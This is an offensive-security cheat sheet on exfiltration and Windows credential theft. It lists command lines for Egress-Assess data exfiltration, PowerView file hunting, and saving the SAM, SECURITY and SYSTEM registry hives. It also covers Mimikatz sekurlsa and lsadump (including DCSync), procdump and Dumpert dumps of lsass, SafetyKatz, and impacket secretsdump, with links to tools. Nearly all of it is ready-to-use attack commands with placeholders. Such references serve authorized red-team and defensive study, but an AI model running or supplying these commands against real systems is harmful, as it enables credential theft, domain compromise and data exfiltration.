Data Mining - Exfiltration

Exfiltration

https://github.com/FortyNorthSecurity/Egress-Assess
HTTP(S) - DNS - FTP

./Egress-Assess.py --server http[s] --username <username> --password <password>
Invoke-EgressAssess -client http[s] -IP <server-IP/domain> --username <username> -Password <password> -Datatype ssn

Find interesting files

PowerView

Find-InterestingFile -Path \\server\share [-Include keyword1,keyword2] [-OfficeDocs] [-LastAccessTime (Get-Date).AddDays(-7)]

NetNTLMv1 hash of the current user

https://github.com/eladshamir/Internal-Monologue

Credentials

Without admin rights

With admin rights

Windows Credential Management

Thread/Process → Token → Logon Session → Auth Package → Credential (optional)
Network logon (type 3): the client proves they have the credentials but does not send them to the server (creds are not in memory)
Non-network logon (Interactive/NetworkCleartext/etc.): the client sends credentials to the service (creds are in lsass.exe)

SAM

reg.exe save hklm\sam <C:\temp>
reg.exe save hklm\system <C:\temp>
lsadump::sam
load kiwi
lsa_dump_sam
use post/windows/gather/smart_hashdump
scanner/smb/impacket/secretsdump
impacket-secretsdump <admin>@<ip> -hashes <lm:nt>

It is possible to retrieve NTLM hashes without touching lsass. https://github.com/eladshamir/Internal-Monologue

Cache

reg.exe save hklm\security <C:\temp>
reg.exe save hklm\system <C:\temp>
lsadump::cache
run post/windows/gather/cachedump
LSASS

https://github.com/GhostPack/SafetyKatz

SafetyKatz.exe

Remove banners before compilation: https://github.com/outflanknl/Dumpert
By default: C:\Windows\temp\dumpert.dmp

dumpert.exe
rundll32.exe dumpert.dll,Dump
-----
procdump.exe -accepteula -ma lsass.exe dump.dmp
-----
sekurlsa::minidump dump.dmp (offline)
sekurlsa::logonPasswords full (offline)
lsadump::lsa /inject
lsadump::lsa /patch (/id:<account_id>)
lsadump::lsa /patch (/name:<account_name>)
use post/windows/gather/smart_hashdump
wce32.exe [-w]
fgdump [-u <user> -p <password> -h <ip>]
Logon sessions
lsadump::dcsync /user:<domain\user> /domain:<fqdn_domain> [/dc:<dc_name>]
sekurlsa::logonPasswords full
load kiwi
creds_all